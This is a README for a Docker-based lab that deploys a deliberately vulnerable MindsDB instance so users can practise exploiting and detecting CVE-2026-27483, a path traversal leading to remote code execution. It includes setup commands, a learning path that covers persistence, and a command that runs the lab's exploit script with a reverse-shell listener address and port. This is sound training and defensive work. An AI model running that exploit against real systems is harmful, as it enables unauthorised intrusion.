Share
## https://sploitus.com/exploit?id=65B7CC0E-9DE5-5564-9737-382B6CE5FCC1
# CVE-2026-27483 Lab - Enterprise Vulnerability Learning Environment

![Status](https://img.shields.io/badge/Status-Active-brightgreen)
![Version](https://img.shields.io/badge/Version-1.0.0-blue)
![MindsDB](https://img.shields.io/badge/MindsDB-25.9.1.0-red)
![CVE](https://img.shields.io/badge/CVE-2026--27483-critical)

A **complete, realistic, enterprise-grade Docker-based lab** for learning, testing, and defending against CVE-2026-27483 (MindsDB Path Traversal RCE).

## ๐ŸŽฏ Quick Start

```bash
# Clone the repository
git clone https://github.com/nabhan-mohy/cve-2026-27483-lab.git
cd cve-2026-27483-lab

# Copy environment file
cp .env.example .env

# Deploy the lab (takes ~2-3 minutes)
docker compose up -d

# Verify deployment
docker compose ps

# Check MindsDB status
curl http://localhost:47334/api/status

# Start learning!
open http://localhost:8080  # Reverse proxy dashboard
```

## ๐Ÿ“‹ Environment Overview

```
Internet (Attacker)
    โ†“
Reverse Proxy (nginx)
    โ†“
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚  MindsDB (Vulnerable)           โ”‚  Port 47334
โ”‚  - Vulnerable to CVE-2026-27483 โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
    โ†“
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚  PostgreSQL Database            โ”‚  Port 5432 (Internal)
โ”‚  - Stores MindsDB data          โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
    โ†“
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚  ELK Stack (Logging)            โ”‚
โ”‚  - Elasticsearch, Logstash       โ”‚  Ports 9200, 5000
โ”‚  - Kibana Dashboard             โ”‚  Port 5601
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
```

## ๐Ÿš€ Deployment Options

### Option 1: Full Enterprise Lab (Recommended)
```bash
docker compose up -d
```

### Option 2: Minimal Lab (MindsDB Only)
```bash
docker compose --profile minimal up -d
```

### Option 3: With Monitoring
```bash
docker compose --profile monitoring up -d
```

## ๐Ÿ“š Documentation

- **[Architecture](docs/architecture/README.md)** - System design & components
- **[Deployment Guide](docs/deployment/README.md)** - Step-by-step setup
- **[Challenges](docs/challenges/README.md)** - 5 learning levels
- **[Detection](docs/detection/README.md)** - Sigma/SPL rules
- **[Incident Response](docs/incident-response/README.md)** - Investigation guide
- **[MITRE Mapping](docs/mitre/README.md)** - ATT&CK techniques

## ๐ŸŽ“ Learning Path

1. **Level 1: Reconnaissance** - Discover the vulnerable application
2. **Level 2: Path Traversal** - Exploit file upload vulnerability
3. **Level 3: RCE** - Achieve remote code execution
4. **Level 4: Persistence** - Maintain access & escalate privileges
5. **Level 5: Defense** - Patch the vulnerability & create detections

## ๐Ÿ”ง Common Commands

```bash
# View logs
docker compose logs -f mindsdb
docker compose logs -f elasticsearch

# Access services
curl http://localhost:47334/api/status         # MindsDB API
http://localhost:5601                          # Kibana
http://localhost:8080                          # Reverse Proxy

# Stop the lab
docker compose down

# Reset to clean state
./scripts/reset.sh

# Run challenges
python3 exploits/exploit.py -t localhost -lh YOUR_IP -lp 4444

# View detection rules
cat rules/sigma/cve-2026-27483.yml
```

## ๐Ÿ“Š Milestones

- โœ… **M1: Foundation** - Docker, networking, documentation
- ๐Ÿšง **M2: Enterprise Environment** - Proxy, database, logging
- ๐Ÿ”„ **M3: Enterprise Assets** - Data, users, configurations
- ๐Ÿ“‹ **M4: Detection & Investigation** - Rules, dashboards
- ๐Ÿ“– **M5: Complete Documentation** - Guides, templates

## ๐Ÿ›ก๏ธ Security Notes

โš ๏ธ **This lab contains intentionally vulnerable software**

- Use ONLY in isolated, non-production environments
- Do not expose to public networks
- For learning and authorized security testing only
- Respect applicable laws and ethical guidelines

## ๐Ÿค Contributing

We welcome contributions! See [CONTRIBUTING.md](CONTRIBUTING.md) for guidelines.

## ๐Ÿ“ License

MIT License - See [LICENSE](LICENSE) for details

## ๐Ÿ† Credits

- **Vulnerability Discovery**: XlabAITeam
- **Original PoC**: Lohitya Pushkar (thewhiteh4t)
- **Lab Development**: Security Research Community

---

**Made with โค๏ธ for the security community** | [Issues](https://github.com/nabhan-mohy/cve-2026-27483-lab/issues) | [Discussions](https://github.com/nabhan-mohy/cve-2026-27483-lab/discussions)